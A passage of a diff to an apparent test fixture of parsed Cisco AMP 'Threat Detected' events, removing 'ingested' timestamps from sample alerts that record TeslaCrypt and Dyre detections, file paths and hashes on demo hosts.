"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1132,7 +1119,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422885600Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1216,7 +1202,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422886872Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1300,7 +1285,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422887751Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1384,7 +1368,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422888782Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1468,7 +1451,6 @@ ], "code": "1090519054", "id": "6176259080131183000", - "ingested": "2022-02-02T05:52:33.422889642Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -1548,7 +1530,6 @@ ], "code": "1090519054", "id": "6159251507855229000", - "ingested": "2022-02-02T05:52:33.422890539Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1632,7 +1613,6 @@ ], "code": "1090519054", "id": "6159251507855229000", - "ingested": "2022-02-02T05:52:33.422891435Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1716,7 +1696,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422892365Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1804,7 +1783,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422893315Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "severity": 2 @@ -1903,7 +1881,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422894224Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -1991,7 +1968,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422895319Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "severity": 2 @@ -2090,7 +2066,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422896234Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 @@ -2178,7 +2153,6 @@ ], "code": "1090519054", "id": "6159251503560262000", - "ingested": "2022-02-02T05:52:33.422897063Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 @@ -2277,7 +2251,6 @@ ], "code": "1090519054", "id": "6176259028591575000", - "ingested": "2022-02-02T05:52:33.422897868Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 @@ -2361,7 +2334,6 @@ ], "code": "1090519054", "id": "6159251439135752000", - "ingested": "2022-02-02T05:52:33.422898673Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat 